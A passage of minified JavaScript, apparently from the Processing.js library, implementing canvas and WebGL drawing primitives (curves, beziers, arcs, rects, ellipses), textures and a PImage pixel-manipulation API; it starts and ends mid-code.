d8=dU.$ensureContext();if(ea.__texture){d8.bindTexture(d8.TEXTURE_2D,ea.__texture)}else{if(ea.localName==="canvas"){d8.bindTexture(d8.TEXTURE_2D,c6);d8.texImage2D(d8.TEXTURE_2D,0,d8.RGBA,d8.RGBA,d8.UNSIGNED_BYTE,ea);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_MAG_FILTER,d8.LINEAR);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_MIN_FILTER,d8.LINEAR);d8.generateMipmap(d8.TEXTURE_2D);cr.width=ea.width;cr.height=ea.height}else{var d9=d8.createTexture(),ec=d.createElement("canvas"),d7=ec.getContext("2d"),eb;if(ea.width&ea.width-1===0){ec.width=ea.width}else{eb=1;while(eb<ea.width){eb*=2}ec.width=eb}if(ea.height&ea.height-1===0){ec.height=ea.height}else{eb=1;while(eb<ea.height){eb*=2}ec.height=eb}d7.drawImage(ea.sourceImg,0,0,ea.width,ea.height,0,0,ec.width,ec.height);d8.bindTexture(d8.TEXTURE_2D,d9);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_MIN_FILTER,d8.LINEAR_MIPMAP_LINEAR);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_MAG_FILTER,d8.LINEAR);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_WRAP_T,d8.CLAMP_TO_EDGE);d8.texParameteri(d8.TEXTURE_2D,d8.TEXTURE_WRAP_S,d8.CLAMP_TO_EDGE);d8.texImage2D(d8.TEXTURE_2D,0,d8.RGBA,d8.RGBA,d8.UNSIGNED_BYTE,ec);d8.generateMipmap(d8.TEXTURE_2D);ea.__texture=d9;cr.width=ea.width;cr.height=ea.height}}dP=true;d8.useProgram(du);dV("usingTexture3d",du,"usingTexture",dP)};cV.textureMode=function(d7){d0=d7};var aq=function(es,ed,ej,eq,ec,ei,eo,eb,eh,em,ea,ef){var et=eq;var ee=ec;var ek=ei;var eg=aJ.array();var er=eg[4]*es+eg[5]*eq+eg[6]*eo+eg[7]*em;var ep=eg[8]*es+eg[9]*eq+eg[10]*eo+eg[11]*em;var en=eg[12]*es+eg[13]*eq+eg[14]*eo+eg[15]*em;var ew=eg[4]*ed+eg[5]*ec+eg[6]*eb+eg[7]*ea;var ev=eg[8]*ed+eg[9]*ec+eg[10]*eb+eg[11]*ea;var eu=eg[12]*ed+eg[13]*ec+eg[14]*eb+eg[15]*ea;var d9=eg[4]*ej+eg[5]*ei+eg[6]*eh+eg[7]*ef;var d8=eg[8]*ej+eg[9]*ei+eg[10]*eh+eg[11]*ef;var d7=eg[12]*ej+eg[13]*ei+eg[14]*eh+eg[15]*ef;cV.vertex(et,ee,ek);for(var el=0;el<O;el++){et+=er;er+=ep;ep+=en;ee+=ew;ew+=ev;ev+=eu;ek+=d9;d9+=d8;d8+=d7;cV.vertex(et,ee,ek)}};bO.prototype.curveVertex=function(d7,d8){dL=true;cV.vertex(d7,d8)};by.prototype.curveVertex=function(d7,ea,d9){dL=true;if(!cL){dn()}var d8=[];d8[0]=d7;d8[1]=ea;d8[2]=d9;ca.push(d8);c1++;if(c1>3){aq(ca[c1-4][0],ca[c1-4][1],ca[c1-4][2],ca[c1-3][0],ca[c1-3][1],ca[c1-3][2],ca[c1-2][0],ca[c1-2][1],ca[c1-2][2],ca[c1-1][0],ca[c1-1][1],ca[c1-1][2])}};bO.prototype.curve=function(){if(arguments.length===8){cV.beginShape();cV.curveVertex(arguments[0],arguments[1]);cV.curveVertex(arguments[2],arguments[3]);cV.curveVertex(arguments[4],arguments[5]);cV.curveVertex(arguments[6],arguments[7]);cV.endShape()}};by.prototype.curve=function(){if(arguments.length===12){cV.beginShape();cV.curveVertex(arguments[0],arguments[1],arguments[2]);cV.curveVertex(arguments[3],arguments[4],arguments[5]);cV.curveVertex(arguments[6],arguments[7],arguments[8]);cV.curveVertex(arguments[9],arguments[10],arguments[11]);cV.endShape()}};cV.curveTightness=function(d7){aH=d7};cV.curveDetail=function(d7){O=d7;dn()};cV.rectMode=function(d7){bI=d7};cV.imageMode=function(d7){switch(d7){case 0:bh=aV;break;case 1:bh=b0;break;case 3:bh=aL;break;default:throw"Invalid imageMode"}};cV.ellipseMode=function(d7){cM=d7};cV.arc=function(ej,eh,ea,el,d9,ei){if(ea<=0||ei<d9){return}if(cM===1){ea=ea-ej;el=el-eh}else{if(cM===2){ej=ej-ea;eh=eh-el;ea=ea*2;el=el*2}else{if(cM===3){ej=ej-ea/2;eh=eh-el/2}}}while(d9<0){d9+=6.283185307179586;ei+=6.283185307179586}if(ei-d9>6.283185307179586){d9=0;ei=6.283185307179586}var ek=ea/2;var em=el/2;var ee=ej+ek;var ec=eh+em;var d8=0|-0.5+d9*cV.RAD_TO_DEG*2;var eg=0|0.5+ei*cV.RAD_TO_DEG*2;var ef,ed;if(aF){var eb=cd;cd=false;cV.beginShape();cV.vertex(ee,ec);for(ef=d8;ef<=eg;ef++){ed=ef%720;cV.vertex(ee+bi[ed]*ek,ec+ag[ed]*em)}cV.endShape(2);cd=eb}if(cd){var d7=aF;aF=false;cV.beginShape();for(ef=d8;ef<=eg;ef++){ed=ef%720;cV.vertex(ee+bi[ed]*ek,ec+ag[ed]*em)}cV.endShape();aF=d7}};bO.prototype.line=function(d8,ef,d7,ed){if(!cd){return}d8=o.round(d8);d7=o.round(d7);ef=o.round(ef);ed=o.round(ed);if(d8===d7&&ef===ed){cV.point(d8,ef);return}var d9=r,eg=r,ec=true,ee=dF.array(),ea=[1,0,0,0,1,0];for(var eb=0;eb<6&&ec;eb++){ec=ee[eb]===ea[eb]}if(ec){if(d8===d7){if(ef>ed){d9=ef;ef=ed;ed=d9}ed++;if(dS%2===1){d4.translate(0.5,0)}}else{if(ef===ed){if(d8>d7){d9=d8;d8=d7;d7=d9}d7++;if(dS%2===1){d4.translate(0,0.5)}}}if(dS===1){eg=d4.lineCap;d4.lineCap="butt"}}d4.beginPath();d4.moveTo(d8||0,ef||0);d4.lineTo(d7||0,ed||0);dc();if(ec){if(d8===d7&&dS%2===1){d4.translate(-0.5,0)}else{if(ef===ed&&dS%2===1){d4.translate(0,-0.5)}}if(dS===1){d4.lineCap=eg}}};by.prototype.line=function(d9,ec,ee,d8,ea,ed){if(ea===r||ed===r){ed=0;ea=d8;d8=ee;ee=0}if(d9===d8&&ec===ea&&ee===ed){cV.point(d9,ec,ee);return}var eb=[d9,ec,ee,d8,ea,ed];var d7=new aM;d7.scale(1,-1,1);d7.apply(dF.array());d7.transpose();if(dS>0&&cd){d4.useProgram(dM);a5("model2d",dM,"model",false,[1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1]);a5("view2d",dM,"view",false,d7.array());dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);db("vertex2d",dM,"Vertex",3,b7);cf("aTextureCoord2d",dM,"aTextureCoord");d4.bufferData(d4.ARRAY_BUFFER,new e(eb),d4.STREAM_DRAW);d4.drawArrays(d4.LINES,0,2)}};bO.prototype.bezier=function(){if(arguments.length!==8){throw"You must use 8 parameters for bezier() in 2D mode"}cV.beginShape();cV.vertex(arguments[0],arguments[1]);cV.bezierVertex(arguments[2],arguments[3],arguments[4],arguments[5],arguments[6],arguments[7]);cV.endShape()};by.prototype.bezier=function(){if(arguments.length!==12){throw"You must use 12 parameters for bezier() in 3D mode"}cV.beginShape();cV.vertex(arguments[0],arguments[1],arguments[2]);cV.bezierVertex(arguments[3],arguments[4],arguments[5],arguments[6],arguments[7],arguments[8],arguments[9],arguments[10],arguments[11]);cV.endShape()};cV.bezierDetail=function(d7){cx=d7};cV.bezierPoint=function(d8,d7,eb,ea,d9){return(1-d9)*(1-d9)*(1-d9)*d8+3*(1-d9)*(1-d9)*d9*d7+3*(1-d9)*d9*d9*eb+d9*d9*d9*ea};cV.bezierTangent=function(d8,d7,eb,ea,d9){return 3*d9*d9*(-d8+3*d7-3*eb+ea)+6*d9*(d8-2*d7+eb)+3*(-d8+d7)};cV.curvePoint=function(d8,d7,eb,ea,d9){return 0.5*(2*d7+(-d8+eb)*d9+(2*d8-5*d7+4*eb-ea)*d9*d9+(-d8+3*d7-3*eb+ea)*d9*d9*d9)};cV.curveTangent=function(d8,d7,eb,ea,d9){return 0.5*(-d8+eb+2*(2*d8-5*d7+4*eb-ea)*d9+3*(-d8+3*d7-3*eb+ea)*d9*d9)};cV.triangle=function(ea,ec,d8,eb,d7,d9){cV.beginShape(9);cV.vertex(ea,ec,0);cV.vertex(d8,eb,0);cV.vertex(d7,d9,0);cV.endShape()};cV.quad=function(ec,ee,ea,ed,d8,eb,d7,d9){cV.beginShape(16);cV.vertex(ec,ee,0);cV.vertex(ea,ed,0);cV.vertex(d8,eb,0);cV.vertex(d7,d9,0);cV.endShape()};var bL=function(ed,ec,d7,ee,eg,eb,ef,d8){if(d8===r){eb=eg;ef=eg;d8=eg}var d9=d7/2,ea=ee/2;if(eg>d9||eg>ea){eg=o.min(d9,ea)}if(eb>d9||eb>ea){eb=o.min(d9,ea)}if(ef>d9||ef>ea){ef=o.min(d9,ea)}if(d8>d9||d8>ea){d8=o.min(d9,ea)}if(!aF||cd){d4.translate(0.5,0.5)}d4.beginPath();d4.moveTo(ed+eg,ec);d4.lineTo(ed+d7-eb,ec);d4.quadraticCurveTo(ed+d7,ec,ed+d7,ec+eb);d4.lineTo(ed+d7,ec+ee-ef);d4.quadraticCurveTo(ed+d7,ec+ee,ed+d7-ef,ec+ee);d4.lineTo(ed+d8,ec+ee);d4.quadraticCurveTo(ed,ec+ee,ed,ec+ee-d8);d4.lineTo(ed,ec+eg);d4.quadraticCurveTo(ed,ec,ed+eg,ec);if(!aF||cd){d4.translate(-0.5,-0.5)}bk();dc()};bO.prototype.rect=function(d8,ee,eb,d7,d9,ec,ea,ed){if(!eb&&!d7){return}if(bI===1){eb-=d8;d7-=ee}else{if(bI===2){eb*=2;d7*=2;d8-=eb/2;ee-=d7/2}else{if(bI===3){d8-=eb/2;ee-=d7/2}}}d8=o.round(d8);ee=o.round(ee);eb=o.round(eb);d7=o.round(d7);if(d9!==r){bL(d8,ee,eb,d7,d9,ec,ea,ed);return}if(cd&&dS%2===1){d4.translate(0.5,0.5)}d4.beginPath();d4.rect(d8,ee,eb,d7);bk();dc();if(cd&&dS%2===1){d4.translate(-0.5,-0.5)}};by.prototype.rect=function(ef,ee,d7,eh,ej,ec,ei,d8){if(ej!==r){throw"rect() with rounded corners is not supported in 3D mode"}if(bI===1){d7-=ef;eh-=ee}else{if(bI===2){d7*=2;eh*=2;ef-=d7/2;ee-=eh/2}else{if(bI===3){ef-=d7/2;ee-=eh/2}}}var eb=new aM;eb.translate(ef,ee,0);eb.scale(d7,eh,1);eb.transpose();var ed=new aM;ed.scale(1,-1,1);ed.apply(dF.array());ed.transpose();if(dS>0&&cd){d4.useProgram(dM);a5("model2d",dM,"model",false,eb.array());a5("view2d",dM,"view",false,ed.array());dY("color2d",dM,"color",cZ);dV("picktype2d",dM,"picktype",0);db("vertex2d",dM,"Vertex",3,aA);cf("aTextureCoord2d",dM,"aTextureCoord");d4.drawArrays(d4.LINE_LOOP,0,aj.length/3)}if(aF){d4.useProgram(du);a5("model3d",du,"model",false,eb.array());a5("view3d",du,"view",false,ed.array());d4.enable(d4.POLYGON_OFFSET_FILL);d4.polygonOffset(1,1);dY("color3d",du,"color",bl);if(dH>0){var eg=new aM;eg.set(ed);var d9=new aM;d9.set(eb);eg.mult(d9);var ea=new aM;ea.set(eg);ea.invert();ea.transpose();a5("normalTransform3d",du,"normalTransform",false,ea.array());db("normal3d",du,"Normal",3,b1)}else{cf("normal3d",du,"Normal")}db("vertex3d",du,"Vertex",3,aA);d4.drawArrays(d4.TRIANGLE_FAN,0,aj.length/3);d4.disable(d4.POLYGON_OFFSET_FILL)}};bO.prototype.ellipse=function(ed,ec,d8,ef){ed=ed||0;ec=ec||0;if(d8<=0&&ef<=0){return}if(cM===2){d8*=2;ef*=2}else{if(cM===1){d8=d8-ed;ef=ef-ec;ed+=d8/2;ec+=ef/2}else{if(cM===0){ed+=d8/2;ec+=ef/2}}}if(d8===ef){d4.beginPath();d4.arc(ed,ec,d8/2,0,6.283185307179586,false);bk();dc()}else{var ee=d8/2,eb=ef/2,d7=0.5522847498307933,ea=d7*ee,d9=d7*eb;cV.beginShape();cV.vertex(ed+ee,ec);cV.bezierVertex(ed+ee,ec-d9,ed+ea,ec-eb,ed,ec-eb);cV.bezierVertex(ed-ea,ec-eb,ed-ee,ec-d9,ed-ee,ec);cV.bezierVertex(ed-ee,ec+d9,ed-ea,ec+eb,ed,ec+eb);cV.bezierVertex(ed+ea,ec+eb,ed+ee,ec+d9,ed+ee,ec);cV.endShape()}};by.prototype.ellipse=function(ek,ej,d9,em){ek=ek||0;ej=ej||0;if(d9<=0&&em<=0){return}if(cM===2){d9*=2;em*=2}else{if(cM===1){d9=d9-ek;em=em-ej;ek+=d9/2;ej+=em/2}else{if(cM===0){ek+=d9/2;ej+=em/2}}}var el=d9/2,eg=em/2,d7=0.5522847498307933,eb=d7*el,ea=d7*eg;cV.beginShape();cV.vertex(ek+el,ej);cV.bezierVertex(ek+el,ej-ea,0,ek+eb,ej-eg,0,ek,ej-eg,0);cV.bezierVertex(ek-eb,ej-eg,0,ek-el,ej-ea,0,ek-el,ej,0);cV.bezierVertex(ek-el,ej+ea,0,ek-eb,ej+eg,0,ek,ej+eg,0);cV.bezierVertex(ek+eb,ej+eg,0,ek+el,ej+ea,0,ek+el,ej,0);cV.endShape();if(aF){var ec=0,eh=0,ee,ed;for(ee=0;ee<a7.length;ee++){ec+=a7[ee][0];eh+=a7[ee][1]}ec/=a7.length;eh/=a7.length;var ef=[],d8=[],ei=[];ef[0]=ec;ef[1]=eh;ef[2]=0;ef[3]=0;ef[4]=0;ef[5]=bl[0];ef[6]=bl[1];ef[7]=bl[2];ef[8]=bl[3];ef[9]=cZ[0];ef[10]=cZ[1];ef[11]=cZ[2];ef[12]=cZ[3];ef[13]=a4;ef[14]=a3;ef[15]=a2;a7.unshift(ef);for(ee=0;ee<a7.length;ee++){for(ed=0;ed<3;ed++){d8.push(a7[ee][ed])}for(ed=5;ed<9;ed++){ei.push(a7[ee][ed])}}dk(d8,"TRIANGLE_FAN",ei)}};cV.normal=function(d7,d9,d8){if(arguments.length!==3||!(typeof d7==="number"&&typeof d9==="number"&&typeof d8==="number")){throw"normal() requires three numeric arguments."}a4=d7;a3=d9;a2=d8;if(dN!==0){if(aY===0){aY=1}else{if(aY===1){aY=2}}}};cV.save=function(d8,d7){if(d7!==r){return B.open(d7.toDataURL(),"_blank")}return B.open(cV.externals.canvas.toDataURL(),"_blank")};var cv=0;cV.saveFrame=function(d7){if(d7===r){d7="screen-####.png"}var d8=d7.replace(/#+/,function(ea){var d9=""+cv++;while(d9.length<ea.length){d9="0"+d9}return d9});cV.save(d8)};var cb=d.createElement("canvas").getContext("2d");var V=[r,r,r];function bv(ee,d8,ed){var ea=V.shift();if(ea===r){ea={};ea.canvas=d.createElement("canvas");ea.context=ea.canvas.getContext("2d")}V.push(ea);var d9=ea.canvas,eb=ea.context,ec=d8||ee.width,d7=ed||ee.height;d9.width=ec;d9.height=d7;if(!ee){eb.clearRect(0,0,ec,d7)}else{if("data" in ee){eb.putImageData(ee,0,0)}else{eb.clearRect(0,0,ec,d7);eb.drawImage(ee,0,0,ec,d7)}}return ea}function bZ(d7){return{getLength:function(d8){return function(){if(d8.isRemote){throw"Image is loaded remotely. Cannot get length."}else{return d8.imageData.data.length?d8.imageData.data.length/4:0}}}(d7),getPixel:function(d8){return function(d9){var eb=d9*4,ea=d8.imageData.data;if(d8.isRemote){throw"Image is loaded remotely. Cannot get pixels."}return(ea[eb+3]&255)<<24|(ea[eb]&255)<<16|(ea[eb+1]&255)<<8|ea[eb+2]&255}}(d7),setPixel:function(d8){return function(d9,ec){var eb=d9*4,ea=d8.imageData.data;if(d8.isRemote){throw"Image is loaded remotely. Cannot set pixel."}ea[eb+0]=(ec>>16)&255;ea[eb+1]=(ec>>8)&255;ea[eb+2]=ec&255;ea[eb+3]=(ec>>24)&255;d8.__isDirty=true}}(d7),toArray:function(d8){return function(){var d9=[],ec=d8.imageData.data,eb=d8.width*d8.height;if(d8.isRemote){throw"Image is loaded remotely. Cannot get pixels."}for(var ea=0,ed=0;ea<eb;ea++,ed+=4){d9.push((ec[ed+3]&255)<<24|(ec[ed]&255)<<16|(ec[ed+1]&255)<<8|ec[ed+2]&255)}return d9}}(d7),set:function(d8){return function(d9){var ed,ec,ee;if(this.isRemote){throw"Image is loaded remotely. Cannot set pixels."}ec=d8.imageData.data;for(var ea=0,eb=d9.length;ea<eb;ea++){ee=d9[ea];ed=ea*4;ec[ed+0]=(ee>>16)&255;ec[ed+1]=(ee>>8)&255;ec[ed+2]=ee&255;ec[ed+3]=(ee>>24)&255}d8.__isDirty=true}}(d7)}}var cF=function(ea,ed,eb){this.__isDirty=false;if(ea instanceof HTMLImageElement){this.fromHTMLImageData(ea)}else{if(ed||eb){this.width=ea||1;this.height=ed||1;var d8=this.sourceImg=d.createElement("canvas");d8.width=this.width;d8.height=this.height;var ee=this.imageData=d8.getContext("2d").createImageData(this.width,this.height);this.format=eb===2||eb===4?eb:1;if(this.format===1){for(var d9=3,ec=this.imageData.data,d7=ec.length;d9<d7;d9+=4){ec[d9]=255}}this.__isDirty=true;this.updatePixels()}else{this.width=0;this.height=0;this.imageData=cb.createImageData(1,1);this.format=2}}this.pixels=bZ(this)};cF.prototype={__isPImage:true,updatePixels:function(){var d7=this.sourceImg;if(d7&&d7 instanceof HTMLCanvasElement&&this.__isDirty){d7.getContext("2d").putImageData(this.imageData,0,0)}this.__isDirty=false},fromHTMLImageData:function(d7){var d8=bv(d7);try{var ea=d8.context.getImageData(0,0,d7.width,d7.height);this.fromImageData(ea)}catch(d9){if(d7.width&&d7.height){this.isRemote=true;this.width=d7.width;this.height=d7.height}}this.sourceImg=d7},get:function(d7,ea,d8,d9){if(!arguments.length){return cV.get(this)}if(arguments.length===2){return cV.get(d7,ea,this)}if(arguments.length===4){return cV.get(d7,ea,d8,d9,this)}},set:function(d7,d9,d8){cV.set(d7,d9,d8,this);this.__isDirty=true},blend:function(ef,eb,ea,d8,ed,eg,ee,ec,d7,d9){if(arguments.length===9){cV.blend(this,ef,eb,ea,d8,ed,eg,ee,ec,d7,this)}else{if(arguments.length===10){cV.blend(ef,eb,ea,d8,ed,eg,ee,ec,d7,d9,this)}}delete this.sourceImg},copy:function(ee,eb,ea,d9,d8,ef,ed,ec,d7){if(arguments.length===8){cV.blend(this,ee,eb,ea,d9,d8,ef,ed,ec,0,this)}else{if(arguments.length===9){cV.blend(ee,eb,ea,d9,d8,ef,ed,ec,d7,0,this)}}delete this.sourceImg},filter:function(d8,d7){if(arguments.length===2){cV.filter(d8,d7,this)}else{if(arguments.length===1){cV.filter(d8,null,this)}}delete this.sourceImg},save:function(d7){cV.save(d7,this)},resize:function(d7,d9){if(this.isRemote){throw"Image is loaded remotely. Cannot resize."}if(this.width!==0||this.height!==0){if(d7===0&&d9!==0){d7=o.floor(this.width/this.height*d9)}else{if(d9===0&&d7!==0){d9=o.floor(this.height/this.width*d7)}}var d8=bv(this.imageData).canvas;var ea=bv(d8,d7,d9).context.getImageData(0,0,d7,d9);this.fromImageData(ea)}},mask:function(d7){var ea=this.toImageData(),d9,d8;if(d7 instanceof cF||d7.__isPImage){if(d7.width===this.width&&d7.height===this.height){d7=d7.toImageData();for(d9=2,d8=this.width*this.height*4;d9<d8;d9+=4){ea.data[d9+1]=d7.data[d9]}}else{throw"mask must have the same dimensions as PImage."}}else{if(d7 instanceof Array){if(this.width*this.height===d7.length){for(d9=0,d8=d7.length;d9<d8;++d9){ea.data[d9*4+3]=d7[d9]}}else{throw"mask array must be the same length as PImage pixels array."}}}this.fromImageData(ea)},loadPixels:E,toImageData:function(){if(this.isRemote){return this.sourceImg}if(!this.__isDirty){return this.imageData}var d7=bv(this.imageData);return d7.context.getImageData(0,0,this.width,this.height)},toDataURL:function(){if(this.isRemote){throw"Image is loaded remotely. Cannot create dataURI."}var d7=bv(this.imageData);return d7.canvas.toDataURL()},fromImageData:function(eb){var d8=eb.width,ea=eb.height,d9=d.createElement("canvas"),d7=d9.getContext("2d");this.width=d9.width=d8;this.height=d9.height=ea;d7.putImageData(eb,0,0);this.format=2;this.imageData=eb;this.sourceImg=d9}};cV.PImage=cF;cV.createImage=function(d7,d8,d9){return new cF(d7,d8,d9)};cV.loadImage=function(d8,d9,eb){if(d9){d8=d8+"."+d9}var ea;if(cP.imageCache.images[d8]){ea=new cF(cP.imageCache.images[d8]);ea.loaded=true;return ea}ea=new cF;var d7=d.createElement("img");ea.sourceImg=d7;d7.onload=function(ef,ed,ec){var eg=ef;var ee=ed;var eh=ec;return function(){ee.fromHTMLImageData(eg);ee.loaded=true;if(eh){eh()}}}(d7,ea,eb);d7.src=d8;return ea};cV.requestImage=cV.loadImage;function c8(d7,ea){var d8;if(d7>=cV.width||d7<0||ea<0||ea>=cV.height){return 0}if(dR){var d9=((0|d7)+cV.width*(0|ea))*4;d8=cV.imageData.data;return(d8[d9+3]&255)<<24|(d8[d9]&255)<<16|(d8[d9+1]&255)<<8|d8[d9+2]&255}d8=cV.toImageData(0|d7,0|ea,1,1).data;return(d8[3]&255)<<24|(d8[0]&255)<<16|(d8[1]&255)<<8|d8[2]&255}function c7(d7,eb,d8){if(d8.isRemote){throw"Image is loaded remotely. Cannot get x,y."}var ea=eb*d8.width*4+d7*4,d9=d8.imageData.data;return(d9[ea+3]&255)<<24|(d9[ea]&255)<<16|(d9[ea+1]&255)<<8|d9[ea+2]&255}function c5(d7,eb,d8,d9){var ea=new cF(d8,d9,2);ea.fromImageData(cV.toImageData(d7,eb,d8,d9));return ea}function c4(ec,eb,ed,ei,eo){if(eo.isRemote){throw"Image is loaded remotely. Cannot get x,y,w,h."}var em=new cF(ed,ei,2),d9=em.imageData.data,ea=eo.width,ej=eo.height,el=eo.imageData.data;var d7=o.max(0,-eb),d8=o.max(0,-ec),ee=o.min(ei,ej-eb),ef=o.min(ed,ea-ec);for(var eh=d7;eh<ee;++eh){var ek=((eb+eh)*ea+(ec+d8))*4;var en=(eh*ed+d8)*4;for(var eg=d8;eg<ef;++eg){d9[en++]=el[ek++];d9[en++]=el[ek++];d9[en++]=el[ek++];d9[en++]=el[ek++]}}em.__isDirty=true;return em}cV.get=function(d7,eb,d8,ea,d9){if(d9!==undefined){return c4(d7,eb,d8,ea,d9)}if(ea!==undefined){return c5(d7,eb,d8,ea)}if(d8!==undefined){return c7(d7,eb,d8)}if(eb!==undefined){return c8(d7,eb)}if(d7!==undefined){return c4(0,0,d7.width,d7.height,d7)}return c5(0,0,cV.width,cV.height)};cV.createGraphics=function(d7,d9,d8){var ea=new D;ea.size(d7,d9,d8);return ea};function R(){if(dR){d4=ai;dR=false;cV.updatePixels()}}function cp(){function d8(ec,ea){function eb(){R();d4[ea].apply(d4,arguments)}ec[ea]=eb}function d7(ed,eb){function ea(){R();return d4[eb]}function ec(ee){R();d4[eb]=ee}cV.defineProperty(ed,eb,{get:ea,set:ec})}for(var d9 in d4){if(typeof d4[d9]==="function"){d8(this,d9)}else{d7(this,d9)}}}function cB(){if(dR){return}cV.loadPixels();if(cm===null){ai=d4;cm=new cp}dR=true;d4=cm;dZ=0}function bu(d7,d9,d8){if(d7<cV.width&&d7>=0&&d9>=0&&d9<cV.height){cB();cV.pixels.setPixel((0|d7)+cV.width*(0|d9),d8);if(++dZ>bY){R()}}}function bs(d7,ed,ea,d8){if(d8.isRemote){throw"Image is loaded remotely. Cannot set x,y."}var ec=cV.color.toArray(ea);var eb=ed*d8.width*4+d7*4;var d9=d8.imageData.data;d9[eb]=ec[0];d9[eb+1]=ec[1];d9[eb+2]=ec[2];d9[eb+3]=ec[3]}cV.set=function(d7,ec,ea,d9){var d8,eb;if(arguments.length===3){if(typeof ea==="number"){bu(d7,ec,ea)}else{if(ea instanceof cF||ea.__isPImage){cV.image(ea,d7,ec)}}}else{if(arguments.length===4){bs(d7,ec,ea,d9)}}};cV.imageData={};cV.pixels={getLength:function(){return cV.imageData.data.length?cV.imageData.data.length/4:0},getPixel:function(d7){var d9=d7*4,d8=cV.imageData.data;return d8[d9+3]<<24&4278190080|d8[d9+0]<<16&16711680|d8[d9+1]<<8&65280|d8[d9+2]&255},setPixel:function(d7,ea){var d9=d7*4,d8=cV.imageData.data;d8[d9+0]=(ea&16711680)>>>16;d8[d9+1]=(ea&65280)>>>8;d8[d9+2]=ea&255;d8[d9+3]=(ea&4278190080)>>>24},toArray:function(){var d7=[],d9=cV.imageData.width*cV.imageData.height,ea=cV.imageData.data;for(var d8=0,eb=0;d8<d9;d8++,eb+=4){d7.push(ea[eb+3]<<24&4278190080|ea[eb+0]<<16&16711680|ea[eb+1]<<8&65280|ea[eb+2]&255)}return d7},set:function(d7){for(var d8=0,d9=d7.length;d8<d9;d8++){this.setPixel(d8,d7[d8])}}};cV.loadPixels=function(){cV.imageData=dU.$ensureContext().getImageData(0,0,cV.width,cV.height)};cV.updatePixels=function(){if(cV.imageData){dU.$ensureContext().putImageData(cV.imageData,0,0)}};cV.hint=function(d8){var d7=dU.$ensureContext();if(d8===4){d7.disable(d7.DEPTH_TEST);d7.depthMask(false);d7.clear(d7.DEPTH_BUFFER_BIT)}else{if(d8===-4){d7.enable(d7.DEPTH_TEST);d7.depthMask(true)}}};var bB=function(ea,d9,d8,d7){var eb;if(ea instanceof cF||ea.__isPImage){eb=ea;if(!eb.loaded){throw"Error using image in background(): PImage not loaded."}if(eb.width!==cV.width||eb.height!==cV.height){throw"Background image must be the same dimensions as the canvas."}}else{eb=cV.color(ea,d9,d8,d7)}a0=eb};bO.prototype.background=function(ea,d9,d8,d7){if(ea!==r){bB(ea,d9,d8,d7)}if(a0 instanceof cF||a0.__isPImage){aC();d4.setTransform(1,0,0,1,0,0);cV.image(a0,0,0);cO()}else{aC();d4.setTransform(1,0,0,1,0,0);if(cV.alpha(a0)!==bR){d4.clearRect(0,0,cV.width,cV.height)}d4.fillStyle=cV.color.toString(a0);d4.fillRect(0,0,cV.width,cV.height);ap=true;cO()}};by.prototype.background=function(ea,d9,d8,d7){if(arguments.length>0){bB(ea,d9,d8,d7)}var eb=cV.color.toGLArray(a0);d4.clearColor(eb[0],eb[1],eb[2],eb[3]);d4.clear(d4.COLOR_BUFFER_BIT|d4.DEPTH_BUFFER_BIT)};bO.prototype.image=function(ea,ef,ed,eg,eb){ef=o.round(ef);ed=o.round(ed);if(ea.width>0){var eh=eg||ea.width;var ee=eb||ea.height;var d7=bh(ef||0,ed||0,eg||ea.width,eb||ea.height,arguments.length<4);var ec=!!ea.sourceImg&&bb===null;if(ec){var d8=ea.sourceImg;if(ea.__isDirty){ea.updatePixels()}d4.drawImage(d8,0,0,d8.width,d8.height,d7.x,d7.y,d7.w,d7.h)}else{var d9=ea.toImageData();if(bb!==null){bb(d9);ea.__isDirty=true}d4.drawImage(bv(d9).canvas,0,0,ea.width,ea.height,d7.x,d7.y,d7.w,d7.h)}}};by.prototype.image=function(d9,d7,eb,d8,ea){if(d9.width>0){d7=o.round(d7);eb=o.round(eb);d8=d8||d9.width;ea=ea||d9.height;cV.beginShape(cV.QUADS);cV.texture(d9);cV.vertex(d7,eb,0,0,0);cV.vertex(d7,eb+ea,0,0,ea);cV.vertex(d7+d8,eb+ea,0,d8,ea);cV.vertex(d7+d8,eb,0,d8,0);cV.endShape()}};cV.tint=function(ea,d9,d7,ef){var ec=cV.color(ea,d9,d7,ef);var d8=cV.red(ec)/bG;var eb=cV.green(ec)/bF;var ed=cV.blue(ec)/bD;var ee=cV.alpha(ec)/bR;bb=function(ej){var ei=ej.data,eh=4*ej.width*ej.height;for(var eg=0;eg<eh;){ei[eg++]*=d8;ei[eg++]*=eb;ei[eg++]*=ed;ei[eg++]*=ee}};bt=function(eh){for(var eg=0;eg<eh.length;){eh[eg++]=d8;eh[eg++]=eb;eh[eg++]=ed;eh[eg++]=ee}}};cV.noTint=function(){bb=null;bt=null};cV.copy=function(d7,ec,eb,ed,d9,ef,ee,d8,ea){if(ea===r){ea=d8;d8=ee;ee=ef;ef=d9;d9=ed;ed=eb;eb=ec;ec=d7;d7=cV}cV.blend(d7,ec,eb,ed,d9,ef,ee,d8,ea,0)};cV.blend=function(d7,eh,eg,ek,ec,em,el,d8,ee,ed,ea){if(d7.isRemote){throw"Image is loaded remotely. Cannot blend image."}if(ed===r){ed=ee;ee=d8;d8=el;el=em;em=ec;ec=ek;ek=eg;eg=eh;eh=d7;d7=cV}var d9=eh+ek,ef=eg+ec,ej=em+d8,eb=el+ee,ei=ea||cV;if(ea===r||ed===r){cV.loadPixels()}d7.loadPixels();if(d7===cV&&cV.intersect(eh,eg,d9,ef,em,el,ej,eb)){cV.blit_resize(cV.get(eh,eg,d9-eh,ef-eg),0,0,d9-eh-1,ef-eg-1,ei.imageData.data,ei.width,ei.height,em,el,ej,eb,ed)}else{cV.blit_resize(d7,eh,eg,d9,ef,ei.imageData.data,ei.width,ei.height,em,el,ej,eb,ed)}if(ea===r){cV.updatePixels()}};var bm=function(eb){var d7=cV.floor(eb*3.5),d9,d8;d7=d7<1?1:d7<248?d7:248;if(cV.shared.blurRadius!==d7){cV.shared.blurRadius=d7;cV.shared.blurKernelSize=1+(cV.shared.blurRadius<<1);cV.shared.blurKernel=new e(cV.shared.blurKernelSize);var ed=cV.shared.blurKernel;var ec=cV.shared.blurKernelSize;var ea=cV.shared.blurRadius;for(d9=0;d9<ec;d9++){ed[d9]=0}var 